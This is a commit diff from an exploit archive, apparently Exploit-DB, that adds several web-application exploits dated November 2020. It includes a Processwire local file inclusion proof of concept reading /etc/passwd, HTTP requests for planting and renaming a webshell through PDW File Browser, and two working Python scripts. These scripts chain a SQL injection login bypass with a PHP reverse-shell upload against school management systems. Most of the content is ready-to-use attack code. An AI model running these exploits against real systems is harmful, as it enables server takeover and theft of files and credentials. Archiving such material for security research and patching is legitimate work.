DB: 2020-11-05

5 changes to exploits/shellcodes

Processwire CMS 2.4.0 - 'download' Local File Inclusion
PDW File Browser 1.3 - Remote Code Execution
School Log Management System 1.0 - 'username' SQL Injection / Remote Code Execution
Student Attendance Management System 1.0 - 'username' SQL Injection / Remote Code Execution
This commit is contained in:
Offensive Security 2020-11-05 05:01:59 +00:00
parent 302d11bcbf
commit 543f8dc781
6 changed files with 177 additions and 0 deletions

View file

@ -0,0 +1,20 @@
# Exploit Title: [Local File Inclusion Processwire CMS 2.4.0]
# Vulnerability Type: Unauthenticated LFI
# Date: [03.11.2020]
# Exploit Author: [Y1LD1R1M]
# Type: [WEBAPPS]
# Platform: [PHP]
# Vendor Homepage: [https://processwire.com/]
# Version: [2.4.0]
# Tested on: [Kali Linux]
** Description **
Local File Inclusion in Processwire CMS 2.4.0 allows to retrieve arbitrary files via the download parameter to index.php By providing a specially crafted path to the vulnerable parameter, a remote attacker can retrieve the contents of sensitive files on the local system.
** Proof of Concept **
http://URL/index.php?download=/etc/passwd
http://URL/index.php?download=../config.php

View file

@ -0,0 +1,46 @@
# Exploit Title: PDW File Browser 1.3 - Remote Code Execution
# Date: 24-10-2020
# Exploit Author: David Bimmel
# Researchers: David Bimmel, Joost Vondeling, Ramòn Janssen
# Vendor Homepage: n/a
# Software Link: https://github.com/GuidoNeele/PDW-File-Browser
# Version: <=1.3
Attack type
Remote
Impact
Remote Code Execution
The PDW File Browser is a plugin for the TinyMCE and CKEditor WYSIWYG editors. The PDW File Browser contains a critical software vulnerability which results in remote code execution on the web server. This vulnerability can be exploited by all authenticated users.
Steps to RCE:
Upload a .txt file containing your webshell code using the default file upload functionality within the PDF file Browser. Please note that all users (including unauthenticated users) are able to access your webshell later on. For security purposes I would recommend using weevely (https://github.com/epinna/weevely3) as this obfuscated and password protects your webshell. Below I have provided how the request should look like for uploading your WEBSHELL.txt file.
POST /ckeditor/plugins/pdw_file_browser/ajax_php_uploader.php?uploadpath=%2Fmedia%2F&qqfile=WEBSHELL.txt HTTP/1.1
Host: <HOSTNAME>
[…]
<?php
<WEBSHELLCODE HERE>
?>
Once you have uploaded your webshell with a .txt extension (WEBSHELL.txt) you are able to rename the file using the rename functionality of the PDW File Browser.
Within this functionality it is possible to both change the file extension your WEBSHELL from .txt to .php and move the file to an arbitrary location on the web server . The path to the arbitrary location should contain double encoded characters.
Below I have provided an example which both renames our WEBSHELL.txt to WEBSHELL.php and relocates the file to the 'content' directory.
POST /ckeditor/plugins/pdw_file_browser/actions.php HTTP/1.1
Host: <HOSTNAME>
[…]
action=rename&new_filename=%252E%252E%252Fcontent%252FWEBSHELL.php&old_filename=WEBSHELL.txt&folder=%252Fmedia%252F&type=file
After this request your webshell should be located at https://<TARGET>/content/WEBSHELL.php
Happy Hacking :^)

53
exploits/php/webapps/48988.py Executable file
View file

@ -0,0 +1,53 @@
# Exploit Title: School Log Management System 1.0 - 'username' SQL Injection / Remote Code Execution
# Date: 4-11-2020
# Exploit Author: mosaaed
# Vendor Homepage: https://www.sourcecodester.com/php/14562/school-log-management-system-using-phpmysqli-source-code.html
# Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/school-log-management-system_1.zip
# Version: 1.0
# Tested on: Parrot 5.5.17 + Apache 2.4.46
# replace shell.php with your own php reverse shell
# change [TARGET URL] to target URL or IP address
# setup your netcat listener for sum good ol shellz
#!/usr/bin/python3
import requests
import time
def sqli_admin():
s = requests.Session()
data = {"username":"admin'or'1'=1#","password":"hacked"}
adminlogin = "http://localhost/slms/admin/ajax.php?action=save_settings"
s.post(adminlogin,data=data)
return s
def trigger_rce(session):
starttime = int(time.time())
multipart_form_data = {
"name": ("cyberscurity"),
"email": ("test@test.com"),
"contact" : ("+11111111111"),
"about" : ("Nothing much about it"),
"img" : ("shell.php", open("shell.php", "rb"))
}
session.post("http://localhost/slms/admin/ajax.php?action=save_settings", files=multipart_form_data)
get_shell(starttime-100,starttime+100,session)
def get_shell(start,end,session):
for i in range(start,end):
session.get("http://localhost/slms/admin/assets/uploads/"+str(i)+"_shell.php")
response = requests.get ("http://localhost/slms/admin/assets/uploads/"+ str(i) +"_shell.php")
if response.status_code == 200:
print("http://localhost/slms/admin/assets/uploads/"+str(i)+"_shell.php")
def main():
session = sqli_admin()
trigger_rce(session)
if __name__ == '__main__':
main()

53
exploits/php/webapps/48989.py Executable file
View file

@ -0,0 +1,53 @@
# Exploit Title: Student Attendance Management System 1.0 - 'username' SQL Injection / Remote Code Execution
# Date: 4-11-2020
# Exploit Author: mosaaed
# Vendor Homepage: https://www.sourcecodester.com/php/14561/student-attendance-management-system-using-phpmysqli-source-code.html
# Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/student-attendance-management-system.zip
# Version: 1.0
# Tested on: Parrot 5.5.17 + Apache 2.4.46
# replace shell.php with your own php reverse shell
# change [TARGET URL] to target URL or IP address
# setup your netcat listener for sum good ol shellz
#!/usr/bin/python3
import requests
import time
def sqli_admin():
s = requests.Session()
data = {"username":"admin'or'1'=1#","password":"mosaaed"}
adminlogin = "http://localhost/sta/ajax.php?action=save_settings"
s.post(adminlogin,data=data)
return s
def trigger_rce(session):
starttime = int(time.time())
multipart_form_data = {
"name": ("cyberscurity"),
"email": ("test@test.com"),
"contact" : ("+11111111111"),
"about" : ("attack"),
"img" : ("shell.php", open("shell.php", "rb"))
}
session.post("http://localhost/sta/ajax.php?action=save_settings", files=multipart_form_data)
get_shell(starttime-100,starttime+100,session)
def get_shell(start,end,session):
for i in range(start,end):
session.get("http://localhost/sta/assets/uploads/"+str(i)+"_shell.php")
response = requests.get ("http://localhost/sta/assets/uploads/"+ str(i) +"_shell.php")
if response.status_code == 200:
print("http://localhost/sta/assets/uploads/"+str(i)+"_shell.php")
def main():
session = sqli_admin()
trigger_rce(session)
if __name__ == '__main__':
main()

View file

@ -2,6 +2,7 @@
# Exploit Author: Nassim Asrir
# Vendor Homepage: https://www.foxitsoftware.com/
# Description: Foxit Reader before 10.0 allows Remote Command Execution via the unsafe app.opencPDFWebPage JavaScript API which allows an attacker to execute local files on the file system and bypass the security dialog.
# CVE-2020-14425
The exploit process need the user-interaction (Opening the PDF) .

View file

@ -40804,6 +40804,10 @@ id,file,description,date,author,type,platform,port
48981,exploits/php/webapps/48981.py,"Monitorr 1.7.6m - Authorization Bypass",2020-11-02,"Lyhin\'s Lab",webapps,php,
48984,exploits/php/webapps/48984.txt,"Multi Restaurant Table Reservation System 1.0 - 'table_id' Unauthenticated SQL Injection",2020-11-03,yunaranyancat,webapps,php,
48985,exploits/php/webapps/48985.txt,"Exploit Title: Complaints Report Management System 1.0 - 'username' SQL Injection / Remote Code Execution",2020-11-03,Mosaaed,webapps,php,
48986,exploits/php/webapps/48986.txt,"Processwire CMS 2.4.0 - 'download' Local File Inclusion",2020-11-04,Y1LD1R1M,webapps,php,
48987,exploits/php/webapps/48987.txt,"PDW File Browser 1.3 - Remote Code Execution",2020-11-04,"David Bimmel",webapps,php,
48988,exploits/php/webapps/48988.py,"School Log Management System 1.0 - 'username' SQL Injection / Remote Code Execution",2020-11-04,Mosaaed,webapps,php,
48989,exploits/php/webapps/48989.py,"Student Attendance Management System 1.0 - 'username' SQL Injection / Remote Code Execution",2020-11-04,Mosaaed,webapps,php,
42884,exploits/multiple/webapps/42884.py,"Fibaro Home Center 2 - Remote Command Execution / Privilege Escalation",2017-02-22,forsec,webapps,multiple,
42805,exploits/php/webapps/42805.txt,"WordPress Plugin WPAMS - SQL Injection",2017-09-26,"Ihsan Sencan",webapps,php,
42889,exploits/php/webapps/42889.txt,"Trend Micro OfficeScan 11.0/XG (12.0) - Private Key Disclosure",2017-09-28,hyp3rlinx,webapps,php,

Can't render this file because it is too large.